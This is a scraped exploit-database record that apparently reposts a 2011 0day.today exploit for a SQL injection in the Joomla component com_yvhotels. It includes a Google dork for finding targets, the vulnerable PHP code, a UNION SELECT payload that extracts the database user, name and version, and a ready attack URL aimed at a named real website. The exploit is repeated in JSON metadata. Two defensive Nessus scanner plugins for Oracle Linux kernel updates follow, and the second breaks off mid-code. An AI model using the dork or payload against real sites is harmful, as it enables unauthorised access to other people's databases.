ID 1337DAY-ID-16531
Type zdt
Reporter z0mbyak
Modified 2011-07-18T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: Joomla com_yvhotels SQL-inj Vuln
# Date: 18.07.2011
# Author: z0mbyak
# Vendor or Software Link: http://joomlaforum.ru/index.php/topic,49006.0.html
# Version: 1.1.1
# Category: [remote, webapps.]
# Google dork: inurl:"index.php?option=com_yvhotels"
# Tested in: web
Code:
function show_info( $task ) {
$id = mosGetParam($_REQUEST, 'id');
switch($task) {
case 'desc':
show_hotel_desc( $id );
break;
case 'facils':
show_hotel_facils( $id );
break;
case 'rooms':
show_hotel_rooms( $id );
break;
case 'address':
show_hotel_address( $id );
break;
}
}
function show_hotel_desc( $id ) {
global $database;
$database->setQuery( "SELECT * FROM #__yvhotels WHERE id=$id");
$rows = $database->loadObjectList();
if ($database->getErrorNum()) {
echo $database->stderr();
return false;
}
$row = $rows[0];
HTML_yvhotels_front::show_hotel_desc( $row );
}
SQL-Inj Vulnerability:
exploit: null+union+all+select+1,2,3,4,user(),6,7,8,9,10,11
,12,database(),version(),15,16,17,18,19,20,21--
VulnSite:
http://www.avalon-travel.ru/index.php?option=com_yvhotels&act=show_info&task=desc&id=null+union+all+select+1,2,3,4,user%28%29,6,7,8,
9,10,11,12,database%28%29,version%28%29,15,16,17,1 8,19,20,21--
Especially for forum.antichat.ru и rdot.org/forum/
Happy hacking)
z0mbyak.
# 0day.today [2018-02-16] #
{"hash": "dcea8b612e5e5aae8438bd5fab12158b58a8ed6c04ee5b7c47072d6b936b6a2e", "id": "1337DAY-ID-16531", "lastseen": "2018-02-16T07:18:22", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "e533ca67bd368d25d816b023d8399c21", "key": "href"}, {"hash": "e9a138aa70ad42eaf7d6551a55a8dcc8", "key": "modified"}, {"hash": "e9a138aa70ad42eaf7d6551a55a8dcc8", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1324d24658da024e81a4115519848e1d", "key": "reporter"}, {"hash": "9c4b9c9e71bc398c7b38d06c2203f148", "key": "sourceData"}, {"hash": "d6b2c809f7dd3b2af68530fe58cd75f5", "key": "sourceHref"}, {"hash": "cb5adfbb901b8374eab6c75c88046844", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-02-16T07:18:22"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16531", "description": "Exploit for php platform in category web applications", "title": "Joomla com_yvhotels SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "b6fc63bb3bec2d2ec6b41ec6abb40fc8496c255cde0dda65a4ea5a5200fbf32b", "id": "1337DAY-ID-16531", "lastseen": "2016-04-20T02:22:51", "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T02:22:51"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1324d24658da024e81a4115519848e1d", "key": "reporter"}, {"hash": "497d186c1d9b8831fe2bfec3f9e391b4", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "cb5adfbb901b8374eab6c75c88046844", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "113af64f36d9036dd39bdb6e064bbb83", "key": "sourceHref"}, {"hash": "ec4c992fa04cfca831f055deba01535c", "key": "href"}, {"hash": "e9a138aa70ad42eaf7d6551a55a8dcc8", "key": "modified"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "e9a138aa70ad42eaf7d6551a55a8dcc8", "key": "published"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16531", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Joomla com_yvhotels SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# Exploit Title: Joomla com_yvhotels SQL-inj Vuln\r\n# Date: 18.07.2011\r\n# Author: z0mbyak\r\n# Vendor or Software Link: http://joomlaforum.ru/index.php/topic,49006.0.html\r\n# Version: 1.1.1\r\n# Category: [remote, webapps.]\r\n# Google dork: inurl:\"index.php?option=com_yvhotels\"\r\n# Tested in: web\r\n\r\nCode:\r\n\r\nfunction show_info( $task ) {\r\n\r\n$id = mosGetParam($_REQUEST, 'id');\r\nswitch($task) {\r\n\r\ncase 'desc':\r\nshow_hotel_desc( $id );\r\nbreak;\r\n\r\ncase 'facils':\r\nshow_hotel_facils( $id );\r\nbreak;\r\n\r\ncase 'rooms':\r\nshow_hotel_rooms( $id );\r\nbreak;\r\n\r\ncase 'address':\r\nshow_hotel_address( $id );\r\nbreak;\r\n\r\n}\r\n}\r\n\r\nfunction show_hotel_desc( $id ) {\r\nglobal $database;\r\n\r\n$database->setQuery( \"SELECT * FROM #__yvhotels WHERE id=$id\");\r\n\r\n$rows = $database->loadObjectList();\r\nif ($database->getErrorNum()) {\r\necho $database->stderr();\r\nreturn false;\r\n}\r\n$row = $rows[0];\r\n\r\nHTML_yvhotels_front::show_hotel_desc( $row );\r\n}\r\n\r\nSQL-Inj Vulnerability:\r\n\r\nexploit: null+union+all+select+1,2,3,4,user(),6,7,8,9,10,11\r\n,12,database(),version(),15,16,17,18,19,20,21--\r\n\r\nVulnSite:\r\nhttp://www.avalon-travel.ru/index.php?option=com_yvhotels&act=show_info&task=desc&id=null+union+all+select+1,2,3,4,user%28%29,6,7,8,\r\n9,10,11,12,database%28%29,version%28%29,15,16,17,1 8,19,20,21--\r\n\r\nEspecially for forum.antichat.ru \u00d0\u00b8 rdot.org/forum/\r\n\r\nHappy hacking)\r\nz0mbyak.\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2011-07-18T00:00:00", "references": [], "reporter": "z0mbyak", "modified": "2011-07-18T00:00:00", "href": "http://0day.today/exploit/description/16531"}, "lastseen": "2016-04-20T02:22:51", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# Exploit Title: Joomla com_yvhotels SQL-inj Vuln\r\n# Date: 18.07.2011\r\n# Author: z0mbyak\r\n# Vendor or Software Link: http://joomlaforum.ru/index.php/topic,49006.0.html\r\n# Version: 1.1.1\r\n# Category: [remote, webapps.]\r\n# Google dork: inurl:\"index.php?option=com_yvhotels\"\r\n# Tested in: web\r\n\r\nCode:\r\n\r\nfunction show_info( $task ) {\r\n\r\n$id = mosGetParam($_REQUEST, 'id');\r\nswitch($task) {\r\n\r\ncase 'desc':\r\nshow_hotel_desc( $id );\r\nbreak;\r\n\r\ncase 'facils':\r\nshow_hotel_facils( $id );\r\nbreak;\r\n\r\ncase 'rooms':\r\nshow_hotel_rooms( $id );\r\nbreak;\r\n\r\ncase 'address':\r\nshow_hotel_address( $id );\r\nbreak;\r\n\r\n}\r\n}\r\n\r\nfunction show_hotel_desc( $id ) {\r\nglobal $database;\r\n\r\n$database->setQuery( \"SELECT * FROM #__yvhotels WHERE id=$id\");\r\n\r\n$rows = $database->loadObjectList();\r\nif ($database->getErrorNum()) {\r\necho $database->stderr();\r\nreturn false;\r\n}\r\n$row = $rows[0];\r\n\r\nHTML_yvhotels_front::show_hotel_desc( $row );\r\n}\r\n\r\nSQL-Inj Vulnerability:\r\n\r\nexploit: null+union+all+select+1,2,3,4,user(),6,7,8,9,10,11\r\n,12,database(),version(),15,16,17,18,19,20,21--\r\n\r\nVulnSite:\r\nhttp://www.avalon-travel.ru/index.php?option=com_yvhotels&act=show_info&task=desc&id=null+union+all+select+1,2,3,4,user%28%29,6,7,8,\r\n9,10,11,12,database%28%29,version%28%29,15,16,17,1 8,19,20,21--\r\n\r\nEspecially for forum.antichat.ru \u00d0\u00b8 rdot.org/forum/\r\n\r\nHappy hacking)\r\nz0mbyak.\r\n\r\n\n\n# 0day.today [2018-02-16] #", "published": "2011-07-18T00:00:00", "references": [], "reporter": "z0mbyak", "modified": "2011-07-18T00:00:00", "href": "https://0day.today/exploit/description/16531"}
{"nessus": [{"lastseen": "2019-02-21T01:36:57", "bulletinFamily": "scanner", "description": "Description of changes:\n\nkernel-uek [3.8.13-118.20.3.el7uek]\n- gre: fix a possible skb leak (Eric Dumazet) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Fix leak in ipv6_gso_segment(). (David S. Miller) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben Hutchings) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. Miller) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) [Orabug: 26403972] {CVE-2017-9074}\n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) [Orabug: 26813390] {CVE-2017-14106}\n- rxrpc: Fix several cases where a padded len isn't checked in ticket decode (David Howells) [Orabug: 26880517] {CVE-2017-7482} {CVE-2017-7482}\n- xen/mmu: Call xen_cleanhighmap() with 4MB aligned for page tables mapping (Zhenzhong Duan) [Orabug: 26883322]\n- KVM: x86: fix deadlock in clock-in-progress request handling (Marcelo Tosatti) [Orabug: 27065995]\n- ocfs2: fstrim: Fix start offset of first cluster group during fstrim (Ashish Samant) [Orabug: 27099835]\n- USB: serial: console: fix use-after-free after failed setup (Johan Hovold) [Orabug: 27206837] {CVE-2017-16525}\n- uwb: properly check kthread_run return value (Andrey Konovalov) [Orabug: 27206897] {CVE-2017-16526}\n- ALSA: usb-audio: Check out-of-bounds access by corrupted buffer descriptor (Takashi Iwai) [Orabug: 27206928] {CVE-2017-16529}\n- USB: fix out-of-bounds in usb_set_configuration (Greg Kroah-Hartman) [Orabug: 27207240] {CVE-2017-16531}\n- USB: core: fix out-of-bounds access bug in usb_get_bos_descriptor() (Alan Stern) [Orabug: 27207983] {CVE-2017-16535}\n- dccp: CVE-2017-8824: use-after-free in DCCP code (Mohamed Ghannam) [Orabug: 27290301] {CVE-2017-8824}", "modified": "2018-02-28T00:00:00", "id": "ORACLELINUX_ELSA-2018-4040.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=107051", "published": "2018-02-28T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4040)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2018-4040.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107051);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2018/02/28 14:56:50 $\");\n\n script_cve_id(\"CVE-2017-14106\", \"CVE-2017-16525\", \"CVE-2017-16526\", \"CVE-2017-16529\", \"CVE-2017-16531\", \"CVE-2017-16535\", \"CVE-2017-7482\", \"CVE-2017-8824\", \"CVE-2017-9074\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4040)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-118.20.3.el7uek]\n- gre: fix a possible skb leak (Eric Dumazet) [Orabug: 26403972] \n{CVE-2017-9074}\n- ipv6: Fix leak in ipv6_gso_segment(). (David S. Miller) [Orabug: \n26403972] {CVE-2017-9074}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben \nHutchings) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. \nMiller) [Orabug: 26403972] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) \n[Orabug: 26403972] {CVE-2017-9074}\n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) \n[Orabug: 26813390] {CVE-2017-14106}\n- rxrpc: Fix several cases where a padded len isn't checked in ticket \ndecode (David Howells) [Orabug: 26880517] {CVE-2017-7482} {CVE-2017-7482}\n- xen/mmu: Call xen_cleanhighmap() with 4MB aligned for page tables \nmapping (Zhenzhong Duan) [Orabug: 26883322]\n- KVM: x86: fix deadlock in clock-in-progress request handling (Marcelo \nTosatti) [Orabug: 27065995]\n- ocfs2: fstrim: Fix start offset of first cluster group during fstrim \n(Ashish Samant) [Orabug: 27099835]\n- USB: serial: console: fix use-after-free after failed setup (Johan \nHovold) [Orabug: 27206837] {CVE-2017-16525}\n- uwb: properly check kthread_run return value (Andrey Konovalov) \n[Orabug: 27206897] {CVE-2017-16526}\n- ALSA: usb-audio: Check out-of-bounds access by corrupted buffer \ndescriptor (Takashi Iwai) [Orabug: 27206928] {CVE-2017-16529}\n- USB: fix out-of-bounds in usb_set_configuration (Greg Kroah-Hartman) \n[Orabug: 27207240] {CVE-2017-16531}\n- USB: core: fix out-of-bounds access bug in usb_get_bos_descriptor() \n(Alan Stern) [Orabug: 27207983] {CVE-2017-16535}\n- dccp: CVE-2017-8824: use-after-free in DCCP code (Mohamed Ghannam) \n[Orabug: 27290301] {CVE-2017-8824}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-February/007537.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-February/007538.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.20.3.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.20.3.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.20.3.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.20.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.20.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.20.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.20.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.20.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.20.3.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.20.3.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.20.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.20.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.20.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.20.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.20.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.20.3.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:36:57", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[2.6.39-400.298.3.el6uek]\n- ext4: limit group search loop for non-extent files (Lachlan McIlroy) [Orabug: 17488415]\n- ext4: fixup 64-bit divides in 3.0-stable backport of upstream fix (Todd Poynor) [Orabug: 17488415]\n- ext4: use atomic64_t for the per-flexbg free_clusters count (Theodore Ts'o) [Orabug: 17488415]\n- ext4: init pagevec in ext4_da_block_invalidatepages (Eric Sandeen) [Orabug: 17488415]\n- ext4: do not try to write superblock on ro remount w/o journal (Michael Tokarev) [Orabug: 17488415]\n- xen-netback: fix grant_copy_op array size (Niranjan Patil) [Orabug: 25653941]\n- xen-netback: explicitly check max_slots_needed against meta_prod counter (Niranjan Patil) [Orabug: 25653941]\n- xen-netback: Fix handling of skbs requiring too many slots (Zoltan Kiss) [Orabug: 25653941]\n- xen-netback: worse-case estimate in xenvif_rx_action is underestimating (Paul Durrant) [Orabug: 25653941]\n- xen-netback: Add worse-case estimates of max_slots_needed in netbk_rx_action (Niranjan Patil) [Orabug: 25653941]\n- KEYS: Remove key_type::match in favour of overriding default by match_preparse (Tim Tianyang Chen) [Orabug: 25757946] {CVE-2017-6951}\n- xen/mmu: Call xen_cleanhighmap() with 4MB aligned for page tables mapping (Zhenzhong Duan) [Orabug: 26737475]\n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) [Orabug: 26813391] {CVE-2017-14106}\n- rxrpc: Fix several cases where a padded len isn't checked in ticket decode (David Howells) [Orabug: 26880520] {CVE-2017-7482} {CVE-2017-7482}\n- ocfs2: fstrim: Fix start offset of first cluster group during fstrim (Ashish Samant) [Orabug: 27099836]\n- Check validity of cl_rpcclient in nfs_server_list_show (Malahal Naineni) [Orabug: 27112186]\n- USB: serial: console: fix use-after-free after failed setup (Johan Hovold) [Orabug: 27206839] {CVE-2017-16525}\n- ALSA: usb-audio: Check out-of-bounds access by corrupted buffer descriptor (Takashi Iwai) [Orabug: 27206934] {CVE-2017-16529}\n- USB: fix out-of-bounds in usb_set_configuration (Greg Kroah-Hartman) [Orabug: 27207243] {CVE-2017-16531}\n- dccp: CVE-2017-8824: use-after-free in DCCP code (Mohamed Ghannam) [Orabug: 27290308] {CVE-2017-8824}", "modified": "2018-02-28T00:00:00", "id": "ORACLELINUX_ELSA-2018-4041.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=107052", "published": "2018-02-28T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2018-4041)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2018-4041.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107052);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2018/02/28 14:56:50 $\");\n\n script_cve_id(\"CVE-2017-14106\", \"CVE-2017-16525\", \"CVE-2017-16529\", \"CVE-2017-16531\", \"CVE-2017-6951\", \"CVE-2017-7482\", \"CVE-2017-8824\");\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2018-4041)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.298.3.el6uek]\n- ext4: limit group search loop for non-extent files (Lachlan McIlroy) \n[Orabug: 17488415]\n- ext4: fixup 64-bit divides in 3.0-stable backport of upstream fix \n(Todd Poynor) [Orabug: 17488415]\n- ext4: use atomic64_t for the per-flexbg free_clusters count (Theodore \nTs'o) [Orabug: 17488415]\n- ext4: init pagevec in ext4_da_block_invalidatepages (Eric Sandeen) \n[Orabug: 17488415]\n- ext4: do not try to write superblock on ro remount w/o journal \n(Michael Tokarev) [Orabug: 17488415]\n- xen-netback: fix grant_copy_op array size (Niranjan Patil) [Orabug: \n25653941]\n- xen-netback: explicitly check max_slots_needed against meta_prod \ncounter (Niranjan Patil) [Orabug: 25653941]\n- xen-netback: Fix handling of skbs requiring too many slots (Zoltan \nKiss) [Orabug: 25653941]\n- xen-netback: worse-case estimate in xenvif_rx_action is \nunderestimating (Paul Durrant) [Orabug: 25653941]\n- xen-netback: Add worse-case estimates of max_slots_needed in \nnetbk_rx_action (Niranjan Patil) [Orabug: 25653941]\n- KEYS: Remove key_type::match in favour of overriding default by \nmatch_preparse (Tim Tianyang Chen) [Orabug: 25757946] {CVE-2017-6951}\n- xen/mmu: Call xen_cleanhighmap() with 4MB aligned for page tables \nmapping (Zhenzhong Duan) [Orabug: 26737475]\n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) \n[Orabug: 26813391] {CVE-2017-14106}\n- rxrpc: Fix several cases where a padded len isn't checked in ticket \ndecode (David Howells) [Orabug: 26880520] {CVE-2017-7482} {CVE-2017-7482}\n- ocfs2: fstrim: Fix start offset of first cluster group during fstrim \n(Ashish Samant) [Orabug: 27099836]\n- Check validity of cl_rpcclient in nfs_server_list_show (Malahal \nNaineni) [Orabug: 27112186]\n- USB: serial: console: fix use-after-free after failed setup (Johan \nHovold) [Orabug: 27206839] {CVE-2017-16525}\n- ALSA: usb-audio: Check out-of-bounds access by corrupted buffer \ndescriptor (Takashi Iwai) [Orabug: 27206934] {CVE-2017-16529}\n- USB: fix out-of-bounds in usb_set_configuration (Greg Kroah-Hartman) \n[Orabug: 27207243] {CVE-2017-16531}\n- dccp: CVE-2017-8824: use-after-free in DCCP code (Mohamed Ghannam) \n[Orabug: 27290308] {CVE-2017-8824}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-February/007539.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif 